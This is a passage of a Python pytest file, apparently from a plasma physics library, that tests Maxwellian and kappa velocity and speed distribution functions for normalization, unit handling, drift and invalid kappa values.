T_distri = (std ** 2 / k_B * m_e).to(u.K)
assert np.isclose(T_distri.value, self.T_e.value)
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = Maxwellian_1D(
v=self.v, T=self.T_e, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = Maxwellian_1D(
v=self.v, T=self.T_e, vTh=self.vTh, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
T_e = T_e.si.value
distFunc = Maxwellian_1D(
v=self.v.si.value, T=T_e, particle=self.particle, units="unitless"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
T_e = T_e.si.value
distFunc = Maxwellian_1D(
v=self.v.si.value,
T=T_e,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = Maxwellian_1D(
v=self.v,
T=self.T_e,
particle=self.particle,
v_drift=self.v_drift2,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
testVal = ((self.vTh ** 2 * np.pi) ** (-1 / 2)).si.value
distFunc = Maxwellian_1D(
v=self.v,
T=self.T_e,
particle=self.particle,
v_drift=self.v_drift3,
units="units",
)
errStr = f"Distribution function should be {testVal} and not {distFunc}."
assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
class Test_Maxwellian_speed_1D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T = 1.0 * u.eV
self.particle = "H+"
# get thermal velocity and thermal velocity squared
self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
self.v = 1e5 * u.m / u.s
self.v_drift = 0 * u.m / u.s
self.v_drift2 = 1e5 * u.m / u.s
self.distFuncTrue = 1.72940389716217e-27
self.distFuncDrift = 2 * (self.vTh ** 2 * np.pi) ** (-1 / 2)
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# setting up integration from 0 to 10*vTh
xData1D = np.arange(0, 10.01, 0.01) * self.vTh
yData1D = Maxwellian_speed_1D(v=xData1D, T=self.T, particle=self.particle)
# integrating, this should be close to 1
integ = spint.trapz(y=yData1D, x=xData1D)
exceptStr = "Integral of distribution function should be 1."
assert np.isclose(integ.value, 1), exceptStr
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = Maxwellian_speed_1D(
v=self.v, T=self.T, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = Maxwellian_speed_1D(
v=self.v, T=self.T, vTh=self.vTh, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_speed_1D(
v=self.v.si.value, T=T, particle=self.particle, units="unitless"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_speed_1D(
v=self.v.si.value,
T=T,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = Maxwellian_speed_1D(
v=self.v,
T=self.T,
particle=self.particle,
v_drift=self.v_drift,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
distFunc = Maxwellian_speed_1D(
v=self.v,
T=self.T,
particle=self.particle,
v_drift=self.v_drift2,
units="units",
)
errStr = f"Distribution function should be 0.0 and not {distFunc}."
assert np.isclose(
distFunc.value, self.distFuncDrift.value, rtol=1e-5, atol=0.0
), errStr
class Test_Maxwellian_velocity_2D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T = 1.0 * u.eV
self.particle = "H+"
# get thermal velocity and thermal velocity squared
self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
self.vx = 1e5 * u.m / u.s
self.vy = 1e5 * u.m / u.s
self.vx_drift = 0 * u.m / u.s
self.vy_drift = 0 * u.m / u.s
self.vx_drift2 = 1e5 * u.m / u.s
self.vy_drift2 = 1e5 * u.m / u.s
self.distFuncTrue = 7.477094598799251e-55
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# converting vTh to unitless
vTh = self.vTh.si.value
# setting up integration from -10*vTh to 10*vTh, which is close to Inf
infApprox = 10 * vTh
# integrating, this should be close to 1
integ = spint.dblquad(
Maxwellian_velocity_2D,
-infApprox,
infApprox,
lambda y: -infApprox,
lambda y: infApprox,
args=(self.T, self.particle, 0, 0, vTh, "unitless"),
epsabs=1e0,
epsrel=1e0,
)
# value returned from dblquad is (integral, error), we just need
# the 1st
integVal = integ[0]
exceptStr = "Integral of distribution function should be 1 and not {integVal}."
assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = Maxwellian_velocity_2D(
vx=self.vx, vy=self.vy, T=self.T, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = Maxwellian_velocity_2D(
vx=self.vx,
vy=self.vy,
T=self.T,
vTh=self.vTh,
particle=self.particle,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_velocity_2D(
vx=self.vx.si.value,
vy=self.vy.si.value,
T=T,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_velocity_2D(
vx=self.vx.si.value,
vy=self.vy.si.value,
T=T,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = Maxwellian_velocity_2D(
vx=self.vx,
vy=self.vy,
T=self.T,
particle=self.particle,
vx_drift=self.vx_drift,
vy_drift=self.vy_drift,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
testVal = ((self.vTh ** 2 * np.pi) ** (-1)).si.value
distFunc = Maxwellian_velocity_2D(
vx=self.vx,
vy=self.vy,
T=self.T,
particle=self.particle,
vx_drift=self.vx_drift2,
vy_drift=self.vy_drift2,
units="units",
)
errStr = f"Distribution function should be {testVal} and not {distFunc}."
assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
@pytest.mark.slow
class Test_Maxwellian_speed_2D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T = 1.0 * u.eV
self.particle = "H+"
# get thermal velocity and thermal velocity squared
self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
self.v = 1e5 * u.m / u.s
self.v_drift = 0 * u.m / u.s
self.v_drift2 = 1e5 * u.m / u.s
self.distFuncTrue = 2.2148166449365907e-26
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# setting up integration from 0 to 10*vTh
xData1D = np.arange(0, 10.001, 0.001) * self.vTh
yData1D = Maxwellian_speed_2D(v=xData1D, T=self.T, particle=self.particle)
# integrating, this should be close to 1
integ = spint.trapz(y=yData1D, x=xData1D)
exceptStr = "Integral of distribution function should be 1."
assert np.isclose(integ.value, 1), exceptStr
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = Maxwellian_speed_2D(
v=self.v, T=self.T, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = Maxwellian_speed_2D(
v=self.v, T=self.T, vTh=self.vTh, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_speed_2D(
v=self.v.si.value, T=T, particle=self.particle, units="unitless"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_speed_2D(
v=self.v.si.value,
T=T,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = Maxwellian_speed_2D(
v=self.v,
T=self.T,
particle=self.particle,
v_drift=self.v_drift,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
with pytest.raises(NotImplementedError):
distFunc = Maxwellian_speed_2D(
v=self.v,
T=self.T,
particle=self.particle,
v_drift=self.v_drift2,
units="units",
)
@pytest.mark.slow
class Test_Maxwellian_velocity_3D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T = 1.0 * u.eV
self.particle = "H+"
# get thermal velocity and thermal velocity squared
self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
self.vx = 1e5 * u.m / u.s
self.vy = 1e5 * u.m / u.s
self.vz = 1e5 * u.m / u.s
self.vx_drift = 0 * u.m / u.s
self.vy_drift = 0 * u.m / u.s
self.vz_drift = 0 * u.m / u.s
self.vx_drift2 = 1e5 * u.m / u.s
self.vy_drift2 = 1e5 * u.m / u.s
self.vz_drift2 = 1e5 * u.m / u.s
self.distFuncTrue = 6.465458269306909e-82
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# converting vTh to unitless
vTh = self.vTh.si.value
# setting up integration from -10*vTh to 10*vTh, which is close to Inf
infApprox = 10 * vTh
# integrating, this should be close to 1
integ = spint.tplquad(
Maxwellian_velocity_3D,
-infApprox,
infApprox,
lambda z: -infApprox,
lambda z: infApprox,
lambda z, y: -infApprox,
lambda z, y: infApprox,
args=(self.T, self.particle, 0, 0, 0, vTh, "unitless"),
epsabs=1e0,
epsrel=1e0,
)
# value returned from tplquad is (integral, error), we just need
# the 1st
integVal = integ[0]
exceptStr = "Integral of distribution function should be 1 and not {integVal}."
assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = Maxwellian_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
particle=self.particle,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = Maxwellian_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
vTh=self.vTh,
particle=self.particle,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_velocity_3D(
vx=self.vx.si.value,
vy=self.vy.si.value,
vz=self.vz.si.value,
T=T,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_velocity_3D(
vx=self.vx.si.value,
vy=self.vy.si.value,
vz=self.vz.si.value,
T=T,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = Maxwellian_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
particle=self.particle,
vx_drift=self.vx_drift,
vy_drift=self.vy_drift,
vz_drift=self.vz_drift,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
testVal = ((self.vTh ** 2 * np.pi) ** (-3 / 2)).si.value
distFunc = Maxwellian_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
particle=self.particle,
vx_drift=self.vx_drift2,
vy_drift=self.vy_drift2,
vz_drift=self.vz_drift2,
units="units",
)
errStr = f"Distribution function should be {testVal} and not {distFunc}."
assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
class Test_Maxwellian_speed_3D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T = 1.0 * u.eV
self.particle = "H+"
# get thermal velocity and thermal velocity squared
self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
self.v = 1e5 * u.m / u.s
self.v_drift = 0 * u.m / u.s
self.v_drift2 = 1e5 * u.m / u.s
self.distFuncTrue = 1.8057567503860518e-25
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# setting up integration from 0 to 10*vTh
xData1D = np.arange(0, 10.01, 0.01) * self.vTh
yData1D = Maxwellian_speed_3D(v=xData1D, T=self.T, particle=self.particle)
# integrating, this should be close to 1
integ = spint.trapz(y=yData1D, x=xData1D)
exceptStr = "Integral of distribution function should be 1."
assert np.isclose(integ.value, 1), exceptStr
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = Maxwellian_speed_3D(
v=self.v, T=self.T, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = Maxwellian_speed_3D(
v=self.v, T=self.T, vTh=self.vTh, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_speed_3D(
v=self.v.si.value, T=T, particle=self.particle, units="unitless"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_speed_3D(
v=self.v.si.value,
T=T,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = Maxwellian_speed_3D(
v=self.v,
T=self.T,
particle=self.particle,
v_drift=self.v_drift,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
with pytest.raises(NotImplementedError):
distFunc = Maxwellian_speed_3D(
v=self.v,
T=self.T,
particle=self.particle,
v_drift=self.v_drift2,
units="units",
)
class Test_kappa_velocity_1D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T_e = 30000 * u.K
self.kappa = 4
self.kappaInvalid = 3 / 2
self.v = 1e5 * u.m / u.s
self.v_drift = 1000000 * u.m / u.s
self.v_drift2 = 0 * u.m / u.s
self.v_drift3 = 1e5 * u.m / u.s
self.start = -5000
self.stop = -self.start
self.dv = 10000 * u.m / u.s
self.v_vect = np.arange(self.start, self.stop, dtype="float64") * self.dv
self.particle = "e"
self.vTh = kappa_thermal_speed(
self.T_e, kappa=self.kappa, particle=self.particle
)
self.distFuncTrue = 6.637935187755855e-07
def test_invalid_kappa(self):
"""
Checks if function raises error when kappa <= 3/2 is passed as an
argument.
"""
with pytest.raises(ValueError):
kappa_velocity_1D(
v=self.v,
T=self.T_e,
kappa=self.kappaInvalid,
particle=self.particle,
units="units",
)
def test_max_noDrift(self):
"""
Checks maximum value of distribution function is in expected place,
when there is no drift applied.
"""
max_index = kappa_velocity_1D(
self.v_vect,
T=self.T_e,
kappa=self.kappa,
particle=self.particle,
v_drift=0 * u.m / u.s,
).argmax()
assert np.isclose(self.v_vect[max_index].value, 0.0)
def test_max_drift(self):
"""
Checks maximum value of distribution function is in expected place,
when there is drift applied.
"""
max_index = kappa_velocity_1D(
self.v_vect,
T=self.T_e,
kappa=self.kappa,
particle=self.particle,
v_drift=self.v_drift,
).argmax()
assert np.isclose(self.v_vect[max_index].value, self.v_drift.value)
def test_maxwellian_limit(self):
"""
Tests the limit of large kappa to see if kappa distribution function
converges to Maxwellian.
"""
return
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# converting vTh to unitless
vTh = self.vTh.si.value
# setting up integration from -10*vTh to 10*vTh, which is close to Inf
infApprox = 10 * vTh
# integrating, this should be close to 1
integ = spint.quad(
kappa_velocity_1D,
-infApprox,
infApprox,
args=(self.T_e, self.kappa, self.particle, 0, vTh, "unitless"),
epsabs=1e0,
epsrel=1e0,
)
# value returned from quad is (integral, error), we just need
# the 1st
integVal = integ[0]
exceptStr = "Integral of distribution function should be 1 and not {integVal}."
assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr
def test_std(self):
"""
Tests standard deviation of function?
"""
std = (
kappa_velocity_1D(
self.v_vect, T=self.T_e, kappa=self.kappa, particle=self.particle
)
* self.v_vect ** 2
* self.dv
).sum()
std = np.sqrt(std)
T_distri = (std ** 2 / k_B * m_e).to(u.K)
assert np.isclose(T_distri.value, self.T_e.value)
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = kappa_velocity_1D(
v=self.v,
T=self.T_e,
kappa=self.kappa,
particle=self.particle,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = kappa_velocity_1D(
v=self.v,
T=self.T_e,
kappa=self.kappa,
vTh=self.vTh,
particle=self.particle,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
T_e = T_e.si.value
distFunc = kappa_velocity_1D(
v=self.v.si.value,
T=T_e,
kappa=self.kappa,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
T_e = T_e.si.value
distFunc = kappa_velocity_1D(
v=self.v.si.value,
T=T_e,
kappa=self.kappa,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = kappa_velocity_1D(
v=self.v,
T=self.T_e,
kappa=self.kappa,
particle=self.particle,
v_drift=self.v_drift2,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
testVal = 6.755498543630533e-07
distFunc = kappa_velocity_1D(
v=self.v,
T=self.T_e,
kappa=self.kappa,
particle=self.particle,
v_drift=self.v_drift3,
units="units",
)
errStr = f"Distribution function should be {testVal} and not {distFunc}."
assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
@pytest.mark.slow
class Test_kappa_velocity_3D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T = 1.0 * u.eV
self.kappa = 4
self.kappaInvalid = 3 / 2
self.particle = "H+"
# get thermal velocity and thermal velocity squared
self.vTh = kappa_thermal_speed(self.T, kappa=self.kappa, particle=self.particle)
self.vx = 1e5 * u.m / u.s
self.vy = 1e5 * u.m / u.s
self.vz = 1e5 * u.m / u.s
self.vx_drift = 0 * u.m / u.s
self.vy_drift = 0 * u.m / u.s
self.vz_drift = 0 * u.m / u.s
self.vx_drift2 = 1e5 * u.m / u.s
self.vy_drift2 = 1e5 * u.m / u.s
self.vz_drift2 = 1e5 * u.m / u.s
self.distFuncTrue = 1.1847914288918793e-22
def test_invalid_kappa(self):
"""
Checks if function raises error when kappa <= 3/2 is passed as an
argument.
"""
with pytest.raises(ValueError):
kappa_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
kappa=self.kappaInvalid,
particle=self.particle,
units="units",
)
# def test_maxwellian_limit(self):
# """
# Tests the limit of large kappa to see if kappa distribution function
# converges to Maxwellian.
# """
# kappaLarge = 100
# kappaDistFunc = kappa_velocity_3D(vx=self.vx,
# vy=self.vy,
# vz=self.vz,
# T=self.T,
# kappa=kappaLarge,
# particle=self.particle,
# vx_drift=self.vx_drift2,
# vy_drift=self.vy_drift2,
# vz_drift=self.vz_drift2,
# units="units")
# Teff = self.T
# maxwellDistFunc = Maxwellian_velocity_3D(vx=self.vx,
# vy=self.vy,
# vz=self.vz,
# T=Teff,
# particle=self.particle,
# vx_drift=self.vx_drift2,
# vy_drift=self.vy_drift2,
# vz_drift=self.vz_drift2,
# units="units")
# errStr = (f"Distribution function should be {maxwellDistFunc} "
# f"and not {kappaDistFunc}.")
# assert np.isclose(kappaDistFunc.value,
# maxwellDistFunc.value,
# rtol=1e-5,
# atol=0.0), errStr
#
# return
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# converting vTh to unitless
vTh = self.vTh.si.value
# setting up integration from -10*vTh to 10*vTh, which is close to Inf
infApprox = 10 * vTh
# integrating, this should be close to 1
integ = spint.tplquad(
kappa_velocity_3D,
-infApprox,
infApprox,
lambda z: -infApprox,
lambda z: infApprox,
lambda z, y: -infApprox,
lambda z, y: infApprox,
args=(self.T, self.kappa, self.particle, 0, 0, 0, vTh, "unitless"),
epsabs=1e0,
epsrel=1e0,
)
# value returned from tplquad is (integral, error), we just need
# the 1st
integVal = integ[0]
exceptStr = "Integral of distribution function should be 1 and not {integVal}."
assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = kappa_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
kappa=self.kappa,
particle=self.particle,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = kappa_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
kappa=self.kappa,
vTh=self.vTh,
particle=self.particle,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = kappa_velocity_3D(
vx=self.vx.si.value,
vy=self.vy.si.value,
vz=self.vz.si.value,
T=T,
kappa=self.kappa,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
"""
Tests distribution function without units, and with passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = kappa_velocity_3D(
vx=self.vx.si.value,
vy=self.vy.si.value,
vz=self.vz.si.value,
T=T,
kappa=self.kappa,
vTh=self.vTh.si.value,
particle=self.particle,
units="unitless",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
